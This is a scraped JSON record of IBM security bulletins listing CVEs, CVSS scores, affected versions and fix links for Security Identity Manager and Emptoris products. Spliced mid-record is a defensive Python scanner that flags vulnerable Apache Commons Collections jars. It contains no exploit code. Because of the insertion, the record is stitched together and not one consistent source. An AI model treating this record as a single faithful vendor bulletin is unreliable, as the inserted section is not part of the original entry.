An attacker could exploit this vulnerability using an overly large password to enumerate usernames and cause the system to hang. \nCVSS Base Score: 5.1 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/106368_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/106368>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L) \n\n**CVEID:** [_CVE-2015-5621_](<https://vulners.com/cve/CVE-2015-5621>)** \nDESCRIPTION:** Net-SNMP is vulnerable to a denial of service, caused by incompletely parsed varBind variables being left in the list of variables by the snmp_pdu_parse() function. A remote attacker could exploit this vulnerability to cause the application to crash or possibly execute arbitrary code on the system. \nCVSS Base Score: 5.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/105232_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/105232>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) \n\n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>)** \nDESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with the Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. 
\nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n## Affected Products and Versions\n\nIBM Security Identity Manager Virtual Appliance versions 7.0.0.0, 7.0.0.1, 7.0.0.2, 7.0.0.3\n\n## Remediation/Fixes\n\nEnsure that the version listed below is installed on the system. \n\nProduct Version| Fix level \n---|--- \nIBM Security Identity Manager (ISIM) Virtual Appliance releases 7.0.0.0, 7.0.0.1, 7.0.0.2, 7.0.0.3| Apply the following: \nIBM Security Identity Manager (ISIM) 7.0.1 release [7.0.1-ISS-SIM-FP0000](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Security%2BSystems&product=ibm/Tivoli/Tivoli+Identity+Manager&release=7.0.1&platform=All&function=all>) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-16T21:38:14", "type": "ibm", "title": "Security Bulletin: Fixes for Multiple Security Vulnerabilities in IBM Security Identity Manager Virtual Appliance available", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", 
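Every CVE-2015-7450 bulletin on this page resolves to the same remediation: no copy of commons-collections below 3.2.2 on the 3.x line (or below 4.1 on the 4.x line) may remain anywhere in the install image, because those are the releases that stop deserializing InvokerTransformer and the other unsafe functors by default. The fixed jars still ship the class, so a scan has to key on version, not on class presence. The scanner below is an added example written for this page, not an IBM tool: it walks a directory tree, reads each commons-collections jar's Maven `pom.properties` (falling back to the file name), and reports any jar that carries InvokerTransformer at a version below the fixed release, or at a version it cannot determine. The jars that `demo()` scans are constructed in a temporary directory with placeholder class bytes; the metadata paths are the ones real Maven-built jars use.

```python
import os
import tempfile
import zipfile
from typing import Dict, Optional, Tuple

# First releases that disable deserialization of the unsafe functors by default.
# Older jars contain the very same classes, so the version decides, not the class list.
FIXED = {3: (3, 2, 2), 4: (4, 1)}
FUNCTOR_CLASSES = (
    "org/apache/commons/collections/functors/InvokerTransformer.class",   # 3.x package
    "org/apache/commons/collections4/functors/InvokerTransformer.class",  # 4.x package
)
Version = Tuple[int, ...]


def parse_version(text: str) -> Version:
    return tuple(int(p) for p in text.strip().split("."))


def jar_version(path: str) -> Optional[Version]:
    """Prefer the Maven pom.properties inside the jar; fall back to a version in the file name."""
    with zipfile.ZipFile(path) as zf:
        for name in zf.namelist():
            if name.startswith("META-INF/maven/") and name.endswith("/pom.properties"):
                for line in zf.read(name).decode("utf-8", "replace").splitlines():
                    if line.startswith("version="):
                        return parse_version(line.split("=", 1)[1])
    stem = os.path.basename(path)[:-len(".jar")]
    tail = stem.rsplit("-", 1)[-1]
    return parse_version(tail) if tail[:1].isdigit() else None


def ships_invoker_transformer(path: str) -> bool:
    with zipfile.ZipFile(path) as zf:
        names = set(zf.namelist())
    return any(c in names for c in FUNCTOR_CLASSES)


def is_vulnerable(version: Optional[Version], has_functor: bool) -> bool:
    """A jar with the functor but no determinable version is reported, never assumed safe."""
    if not has_functor:
        return False
    if version is None or version[0] not in FIXED:
        return True
    return version < FIXED[version[0]]


def scan(root: str) -> Dict[str, Tuple[Optional[Version], bool]]:
    """Map each commons-collections jar under root (relative path) to (version, vulnerable)."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for f in files:
            if f.startswith("commons-collections") and f.endswith(".jar"):
                p = os.path.join(dirpath, f)
                v = jar_version(p)
                findings[os.path.relpath(p, root)] = (v, is_vulnerable(v, ships_invoker_transformer(p)))
    return findings


def _write_jar(path: str, group: str, artifact: str, version: str, functor_class: str) -> None:
    # Constructed stand-in for a real jar: one class entry plus Maven metadata.
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with zipfile.ZipFile(path, "w") as zf:
        zf.writestr(functor_class, b"\xca\xfe\xba\xbe")
        zf.writestr(f"META-INF/maven/{group}/{artifact}/pom.properties",
                    f"version={version}\ngroupId={group}\nartifactId={artifact}\n")


def demo() -> Dict[str, Tuple[Optional[Version], bool]]:
    """Build a constructed install tree (sample data, not a real product image) and scan it."""
    root = tempfile.mkdtemp(prefix="cc-scan-")
    c3, c4 = FUNCTOR_CLASSES
    _write_jar(os.path.join(root, "lib", "commons-collections-3.2.jar"),
               "commons-collections", "commons-collections", "3.2", c3)
    _write_jar(os.path.join(root, "lib", "patched", "commons-collections-3.2.2.jar"),
               "commons-collections", "commons-collections", "3.2.2", c3)
    _write_jar(os.path.join(root, "plugins", "commons-collections4-4.0.jar"),
               "org.apache.commons", "commons-collections4", "4.0", c4)
    # A renamed copy with neither a versioned name nor pom.properties: must be reported.
    os.makedirs(os.path.join(root, "legacy"), exist_ok=True)
    with zipfile.ZipFile(os.path.join(root, "legacy", "commons-collections.jar"), "w") as zf:
        zf.writestr(c3, b"\xca\xfe\xba\xbe")
    return {os.path.basename(k): v for k, v in scan(root).items()}


if __name__ == "__main__":
    for name, (version, vulnerable) in sorted(demo().items()):
        print(f"{'VULNERABLE' if vulnerable else 'ok        '} {name} version={version}")
```

Run it against a real image with `scan("/opt/IBM/...")` and treat every `True` as a jar to replace, including the unknown-version case; a vendor patch that drops 3.2.2 beside an untouched 3.2 copy on the same classpath is exactly what this catches.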
"authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-3565", "CVE-2014-3613", "CVE-2014-3707", "CVE-2014-8121", "CVE-2014-8150", "CVE-2014-9297", "CVE-2014-9298", "CVE-2015-1798", "CVE-2015-1799", "CVE-2015-1819", "CVE-2015-2017", "CVE-2015-2730", "CVE-2015-3143", "CVE-2015-3148", "CVE-2015-3238", "CVE-2015-5621", "CVE-2015-7450"], "modified": "2018-06-16T21:38:14", "id": "9FD738448ACD93F4450A43269B40F6F0A44AE4531A251D9858867B18DD433AE4", "href": "https://www.ibm.com/support/pages/node/273647", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-30T21:39:39", "description": "## Question\n\nSecurity Bulletins for Emptoris Sourcing\n\n## Answer\n\n**This article tracks all Security Bulletins for Emptoris Sourcing.**\n\nIBM's Product Security Incident Response Team (PSIRT) follows the NIST guidelines for determining the severity rating of the reported vulnerability - see \"[**NVD Vulnerability Severity Ratings**](<http://nvd.nist.gov/cvss.cfm>)\" for details. Please use this information to take the appropriate actions.\n\nIn our effort to serve you better we recommend that you subscribe to this article for notification of future Security Bulletins and advisories posted here. 
\n \n\n\nOctober 13th 2017\n\n * [**_Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM _**](<http://www.ibm.com/support/docview.wss?uid=swg22008401>)[**_Emptoris_**](<http://www.ibm.com/support/docview.wss?uid=swg22008401>)**_[ Strategic Supply Management and IBM Emptoris Services Procurement products](<http://www.ibm.com/support/docview.wss?uid=swg22008401>)_**\n\n \nOctober 13th 2017\n\n * [**_Security Bulletin: Potential security vulnerability in selected fixpacks of WebSphere Application Server affects IBM Emptoris Strategic Supply Management suite of products and IBM Emptoris Services Procurement (CVE-2017-1501)_**](<http://www.ibm.com/support/docview.wss?uid=swg22008410>)\n\n \nOctober 13th 2017\n\n * [**_Security Bulletin: Multiple vulnerabilities in IBM WebSphere Application Server affects IBM Emptoris Strategic Supply Management suite of products and IBM Emptoris Services Procurement (CVE-2017-1380 CVE-2017-1382)_**](<http://www.ibm.com/support/docview.wss?uid=swg22007774>)\n\n \nOctober 13th 2017\n\n * [**_Security Bulletin: Open Source Apache Tomcat Vulnerabilities affect the IBM Emptoris Strategic Supply Management suite of products (CVE-2016-3092)_**](<http://www.ibm.com/support/docview.wss?uid=swg22005604>)\n\n \nMay 11th 2016\n\n * **[Security Bulletin: IBM Emptoris Sourcing is affected by open redirect vulnerability (CVE-2016-0329) ](<http://www.ibm.com/support/docview.wss?uid=swg21982629>)**\n\nDecember 1st 2015\n\n * **[Security Bulletin: Vulnerability in Apache Commons affects IBM Emptoris Strategic Supply Management and IBM Emptoris Services Procurement. 
(CVE-2015-7450)](<http://www-01.ibm.com/support/docview.wss?uid=swg21971731>)**\n\n \nSeptember 23 2015\n\n * **[Security Bulletin: Information disclosure vulnerability reported in IBM Emptoris Sourcing (CVE-2015-5024)](<http://www-01.ibm.com/support/docview.wss?uid=swg21967255>)**\n\n \nAugust 26 2015\n\n * **[Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Emptoris Strategic Supply Management and IBM Emptoris Services Procurement.](<https://www-304.ibm.com/support/docview.wss?uid=swg21964808>)**\n\n \nJune 24 2015\n\n * **[Security Bulletin: Vulnerability reported in WebSphere Application Server management port affects IBM Emptoris Strategic Supply Management and IBM Emptoris Services Procurement (CVE-2015-1920)](<https://www-304.ibm.com/support/docview.wss?uid=swg21960518>)**\n\n \nApril 8 2015\n\n * **[IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Emptoris Strategic Supply Management IBM Emptoris Rivermine Telecom Expense Management and IBM Emptoris Services Procurement (CVE-2014-6593 CVE-2015-0410)](<http://www-01.ibm.com/support/docview.wss?uid=swg21700707>)**\n\nJanuary 27 2015\n\n * **[IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Emptoris Strategic Supply Management IBM Emptoris Rivermine Telecom Expense Management and IBM Emptoris Services Procurement (CVE-2014-3566 CVE-2014-6457)](<http://www-01.ibm.com/support/docview.wss?uid=swg21695096>)**\n\nDecember 31 2014\n\n * **[IBM Security Bulletin: Multiple vulnerabilities related to XML DoS attack IBM Emptoris Strategic Supply Management Suite products (CVE-2014-3529 CVE-2014-3574)](<http://www-01.ibm.com/support/docview.wss?uid=swg21693069>)**\n\nSeptember 17 2014\n\n * **[IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Emptoris Strategic Supply Management IBM Emptoris Rivermine Telecom Expense Management and IBM Emptoris Services Procurement (CVE-2014-4263 CVE-2014-4244) 
](<http://www-01.ibm.com/support/docview.wss?uid=swg21684482>)**\n\nAugust 23 2014\n\n * **[IBM Security Bulletin: Multiple vulnerabilities in IBM Emptoris Sourcing Portfolio (CVE-2014-3033 CVE-2014-4790 CVE-2014-3040) ](<http://www-01.ibm.com/support/docview.wss?uid=swg21680665>)**\n\" \n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSYR8W\",\"label\":\"Emptoris Sourcing\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"All Versions\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB02\",\"label\":\"AI Applications\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-12-08T15:10:02", "type": "ibm", "title": "Security Bulletins for Emptoris Sourcing", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-3033", "CVE-2014-3040", "CVE-2014-3529", "CVE-2014-3566", "CVE-2014-3574", "CVE-2014-4244", "CVE-2014-4263", "CVE-2014-4790", "CVE-2014-6457", "CVE-2014-6593", "CVE-2015-0410", "CVE-2015-1920", "CVE-2015-5024", "CVE-2015-7450", "CVE-2016-0329", "CVE-2016-3092", "CVE-2017-1380", 
"CVE-2017-1382", "CVE-2017-1501"], "modified": "2018-12-08T15:10:02", "id": "B0A606101370774E5FB3E4409A17D910B4B5997971AC7B7045727379D355B696", "href": "https://www.ibm.com/support/pages/node/783533", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-30T21:39:49", "description": "## Question\n\nSecurity Bulletins for Emptoris Services Procurement\n\n## Answer\n\n**This article tracks all Security Bulletins for Emptoris Services Procurement.** \n \nIBM's Product Security Incident Response Team (PSIRT) follows the NIST guidelines for determining the severity rating of the reported vulnerability - see \"[**NVD Vulnerability Severity Ratings**](<http://nvd.nist.gov/cvss.cfm>)\" for details. Please use this information to take the appropriate actions. \n \nIn our effort to serve you better we recommend that you subscribe to this article for notification of new Security Bulletins and advisories posted here. \n\n\nOctober 13th 2017\n\n * [**_Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM _**](<http://www.ibm.com/support/docview.wss?uid=swg22008401>)[**_Emptoris_**](<http://www.ibm.com/support/docview.wss?uid=swg22008401>)**_[ Strategic Supply Management and IBM Emptoris Services Procurement products](<http://www.ibm.com/support/docview.wss?uid=swg22008401>)_**\n\n \nOctober 13th 2017\n\n * [**_Security Bulletin: Potential security vulnerability in selected fixpacks of WebSphere Application Server affects IBM Emptoris Strategic Supply Management suite of products and IBM Emptoris Services Procurement (CVE-2017-1501)_**](<http://www.ibm.com/support/docview.wss?uid=swg22008410>)\n\nOctober 13th 2017\n\n * [**_Security Bulletin: Multiple vulnerabilities in IBM WebSphere Application Server affects IBM Emptoris Strategic Supply Management suite of products and IBM Emptoris Services Procurement (CVE-2017-1380 CVE-2017-1382)_**](<http://www.ibm.com/support/docview.wss?uid=swg22007774>)\n\n \nOctober 13th 2017\n\n * 
[**_Security Bulletin: IBM Emptoris Services Procurement is affected by Information leakage vulnerability (CVE-2017-1547)_**](<http://www-01.ibm.com/support/docview.wss?uid=swg22007770>)\n\n \nOctober 13th 2017\n\n * [**_Security Bulletin: Open Source Apache Tomcat Vulnerabilities affect the IBM Emptoris Strategic Supply Management suite of products (CVE-2016-3092)_**](<http://www.ibm.com/support/docview.wss?uid=swg22005604>)\n \nJuly 14th 2017\n\n * **[Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Emptoris Strategic Supply Management and IBM Emptoris Services Procurement products.](<http://www.ibm.com/support/docview.wss?uid=swg22004442>)**\n \nJuly 14th 2017\n\n * **[Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Emptoris Strategic Supply Management and IBM Emptoris Services Procurement products.](<http://www.ibm.com/support/docview.wss?uid=swg22003479>)**\n \nJune 13th 2017\n\n * **[Security Bulletin: Vulnerability in IBM WebSphere Application Server affects IBM Emptoris Strategic Supply Management and IBM Emptoris Services Procurement products (CVE-2016-8919)](<http://www-01.ibm.com/support/docview.wss?uid=swg22004642>)**\n \nJune 13th 2017\n\n * **[Security Bulletin: Vulnerability in IBM WebSphere Application Server affects IBM Emptoris Strategic Supply Management and IBM Emptoris Services Procurement products (CVE-2017-1121](<http://www.ibm.com/support/docview.wss?uid=swg22004706>)**\n \nJune 12th 2017\n\n * **[Security Bulletin: Vulnerability in IBM Websphere Application Server affects IBM Emptoris Strategic Supply Management and IBM Emptoris Services Procurement products (CVE-2017-1137)](<http://www.ibm.com/support/docview.wss?uid=swg22004666>)**\n \nJun 12 2017\n\n * [**Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Emptoris Strategic Supply Management and IBM Emptoris Services Procurement products. 
**](<http://www-01.ibm.com/support/docview.wss?uid=swg22004666&myns=swgother&mynp=OCSSYQ72&mynp=OCSSYR6U&mynp=OCSSYQAR&mynp=OCSSYR8W&mynp=OCSSYRER&mynp=OCSSYQ89&mync=E&cm_sp=swgother-_-OCSSYQ72-OCSSYR6U-OCSSYQAR-OCSSYR8W-OCSSYRER-OCSSYQ89-_-E>)\n \n \nJan 18 2017\n\n * **[S](<http://www-01.ibm.com/support/docview.wss?uid=swg21996820>)**[**ecurity Bulletin: Multiple vulnerabilities in IBM Java SDK and IBM WebSphere Application Server affect IBM Emptoris Strategic Supply Management and IBM Emptoris Services Procurement** ](<http://www-01.ibm.com/support/docview.wss?uid=swg21996820>)\n \n \nJuly 14 2016\n\n * [**Security Bulletin: A JMX component vulnerability in IBM Java SDK and IBM WebSphere Application Server affects IBM Emptoris Strategic Supply Management Suite and IBM Emptoris Services Procurement (CVE-2016-3427)**](<http://www-01.ibm.com/support/docview.wss?uid=swg21986797>)\n \n \nMarch 7 2016\n\n * [**Security Bulletin: Multiple vulnerabilities in IBM Java SDK and IBM WebSphere Application Server affect IBM Emptoris Strategic Supply **](<http://www-01.ibm.com/support/docview.wss?uid=swg21978028>)**[Management](<http://www-01.ibm.com/support/docview.wss?uid=swg21978028>)**[** and IBM Emptoris Services Procurement (CVE-2015-7575 CVE-2016-0466 CVE-2015-7417)**](<http://www-01.ibm.com/support/docview.wss?uid=swg21978028>)\n \nDecember 15 2015\n\n * [**Security Bulletin: A security vulnerability has been identified in IBM WebSphere Application Server used with IBM Emptoris Strategic Supply Management and IBM Emptoris Services Procurement products (CVE-2015-4872)**](<http://www-01.ibm.com/support/docview.wss?uid=swg21972272>)\n \nDecember 1st 2015\n\n * **[Security Bulletin: Vulnerability in Apache Commons affects IBM Emptoris Strategic Supply Management and IBM Emptoris Services Procurement. 
(CVE-2015-7450)](<http://www-01.ibm.com/support/docview.wss?uid=swg21971731>)**\n \nNovember 06 2015\n\n * [**Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Emptoris Strategic Supply Management and IBM Emptoris Services Procurement.**](<http://www-01.ibm.com/support/docview.wss?uid=swg21969875>)\n \nAugust 26th 2015\n\n * **Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Emptoris Strategic Supply Management and IBM Emptoris Services Procurement.**\n \nJune 24th 2015\n\n * **[Security Bulletin: Vulnerability reported in WebSphere Application Server management port affects IBM Emptoris Strategic Supply Management and IBM Emptoris Services Procurement (CVE-2015-1920)](<https://emptoris.support.ibmcloud.com/ics/support/default.asp?deptID=31019&task=knowledge&questionID=21574&languageID=>)**\n \nApril 8th 2015\n\n * **[IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Emptoris Strategic Supply Management IBM Emptoris Rivermine Telecom Expense Management and IBM Emptoris Services Procurement (CVE-2014-6593 CVE-2015-0410)](<http://www-01.ibm.com/support/docview.wss?uid=swg21700707>)**\nJanuary 27th 2015\n * **[IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Emptoris Strategic Supply Management IBM Emptoris Rivermine Telecom Expense Management and IBM Emptoris Services Procurement (CVE-2014-3566 CVE-2014-6457)](<http://www-01.ibm.com/support/docview.wss?uid=swg21695096>)**\nJanuary 20th 2015\n * **[IBM Security Bulletin: Multiple vulnerabilities related to XML DoS attack IBM Emptoris Services Procurement (CVE-2014-3529 CVE-2014-3574)](<http://www-01.ibm.com/support/docview.wss?uid=swg21694987>)**\nSeptember 17th 2014\n * **[IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Emptoris Strategic Supply Management IBM Emptoris Rivermine Telecom Expense Management and IBM Emptoris Services Procurement (CVE-2014-4263 
CVE-2014-4244)](<http://www-01.ibm.com/support/docview.wss?uid=swg21684482>)**\n\" \n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSYR6U\",\"label\":\"Emptoris Services Procurement\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"All Versions\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB02\",\"label\":\"AI Applications\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-12-08T16:15:01", "type": "ibm", "title": "Security Bulletins for Emptoris Services Procurement", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-3529", "CVE-2014-3566", "CVE-2014-3574", "CVE-2014-4244", "CVE-2014-4263", "CVE-2014-6457", "CVE-2014-6593", "CVE-2015-0410", "CVE-2015-1920", "CVE-2015-4872", "CVE-2015-7417", "CVE-2015-7450", "CVE-2015-7575", "CVE-2016-0466", "CVE-2016-3092", "CVE-2016-3427", "CVE-2016-8919", "CVE-2017-1121", "CVE-2017-1137", "CVE-2017-1380", "CVE-2017-1382", "CVE-2017-1501", "CVE-2017-1547"], "modified": "2018-12-08T16:15:01", "id": 
"7996A5B21090888A5E92985E9AA52C1DFFD5B468A73A1B32557A0A11DFBE0724", "href": "https://www.ibm.com/support/pages/node/783543", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-30T21:39:49", "description": "## Question\n\nSecurity Bulletins for Emptoris Contract Management\n\n## Answer\n\n**This article tracks all Security Bulletins for Emptoris Contract Management.**\n\nIBM's Product Security Incident Response Team (PSIRT) follows the NIST guidelines for determining the severity rating of the reported vulnerability - see \"[**NVD Vulnerability Severity Ratings**](<http://nvd.nist.gov/cvss.cfm>)\" for details. Please use this information to take the appropriate actions. \n \nWe recommend that you subscribe to this article to receive notification of future Security Bulletins and advisories posted here. \n\n\nOctober 13th 2017\n\n * [**_Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM _**](<http://www.ibm.com/support/docview.wss?uid=swg22008401>)[**_Emptoris_**](<http://www.ibm.com/support/docview.wss?uid=swg22008401>)[**_[ Strategic Supply Management and IBM Emptoris Services Procurement products](<http://www.ibm.com/support/docview.wss?uid=swg22008401>)_**](<http://www.ibm.com/support/docview.wss?uid=swg22005604>)\n\n \nOctober 13th 2017\n\n * [**_Security Bulletin: Potential security vulnerability in selected fixpacks of WebSphere Application Server affects IBM Emptoris Strategic Supply Management suite of products and IBM Emptoris Services Procurement (CVE-2017-1501)_**](<http://www.ibm.com/support/docview.wss?uid=swg22008410>)\n\n \nOctober 13th 2017\n\n * [**_Security Bulletin: Multiple vulnerabilities in IBM WebSphere Application Server affects IBM Emptoris Strategic Supply Management suite of products and IBM Emptoris Services Procurement (CVE-2017-1380 CVE-2017-1382)_**](<http://www.ibm.com/support/docview.wss?uid=swg22007774>)\n\n \nOctober 13th 2017\n\n * [**_Security Bulletin: Open Source Apache 
Tomcat Vulnerabilities affect the IBM Emptoris Strategic Supply Management suite of products (CVE-2016-3092)_**](<http://www.ibm.com/support/docview.wss?uid=swg22005604>)\n\n \nOctober 13th 2017\n\n * [**_Security Bulletin: Detailed error messages in IBM Emptoris Contract Management are vulnerable to attacks (CVE-2016-6018)_**](<http://www.ibm.com/support/docview.wss?uid=swg22005664>)\n\n \nMay 2nd 2016\n\n * **[Security Bulletin: Vulnerability in BeanShell affects IBM Emptoris Strategic Supply Management. (CVE-2016-2510)](<http://www.ibm.com/support/docview.wss?uid=swg21982152&myns=swgother&mynp=OCSSYRER&mynp=OCSSYQ89&mync=E&cm_sp=swgother-_-OCSSYRER-OCSSYQ89-_-E>)**\n\n \nFebruary 1st 2016\n\n * **_[Security Bulletin: Multiple vulnerabilities in IBM Emptoris Contract Management (CVE-2015-5050 CVE-2015-5042 CVE-2015-7398)](<http://www-01.ibm.com/support/docview.wss?uid=swg21973592>)_**\n\n \nDecember 1st 2015\n\n * **[Security Bulletin: Vulnerability in Apache Commons affects IBM Emptoris Strategic Supply Management and IBM Emptoris Services Procurement. 
(CVE-2015-7450)](<http://www-01.ibm.com/support/docview.wss?uid=swg21971731>)**\n\nAugust 26 2015\n\n * **[Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Emptoris Strategic Supply Management and IBM Emptoris Services Procurement.](<https://www-304.ibm.com/support/docview.wss?uid=swg21964808>)**\n\nJune 24 2015\n\n * **[Security Bulletin: Vulnerability reported in WebSphere Application Server management port affects IBM Emptoris Strategic Supply Management and IBM Emptoris Services Procurement (CVE-2015-1920)](<https://www-304.ibm.com/support/docview.wss?uid=swg21960518>)**\n \nApril 8 2015\n\n * **_[IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Emptoris Strategic Supply Management IBM Emptoris Rivermine Telecom Expense Management and IBM Emptoris Services Procurement (CVE-2014-6593 CVE-2015-0410)](<http://www-01.ibm.com/support/docview.wss?uid=swg21700707>)_**\n\nJanuary 27 2015\n\n * **[IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Emptoris Strategic Supply Management IBM Emptoris Rivermine Telecom Expense Management and IBM Emptoris Services Procurement (CVE-2014-3566 CVE-2014-6457)](<http://www-01.ibm.com/support/docview.wss?uid=swg21695096>)**\n\n
December 31 2014\n\n * **[IBM Security Bulletin: Multiple vulnerabilities related to XML DoS attack IBM Emptoris Strategic Supply Management Suite products (CVE-2014-3529 CVE-2014-3574)](<http://www-01.ibm.com/support/docview.wss?uid=swg21693069>)**\n\nNovember 13 2014\n\n * **[Security Bulletin: JBoss RestEasy vulnerabilities in IBM Emptoris Contract Management (CVE-2014-3490)](<http://www-01.ibm.com/support/docview.wss?uid=swg21684482>)**\n\nSeptember 17 2014\n\n * **[Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Emptoris Strategic Supply Management IBM Emptoris Rivermine Telecom Expense Management and IBM Emptoris Services Procurement (CVE-2014-4263 CVE-2014-4244)](<http://www-01.ibm.com/support/docview.wss?uid=swg21684482>)**\n\nAugust 23 2014\n\n * **[IBM Security Bulletin: Multiple vulnerabilities in IBM Emptoris Contract Management (CVE-2014-3041 CVE-2014-3034 CVE-2014-3040) ](<http://www-01.ibm.com/support/docview.wss?uid=swg21680370>)**\n\n\" \n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSYQ89\",\"label\":\"Emptoris Contract Management\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"All Versions\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB02\",\"label\":\"AI Applications\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", 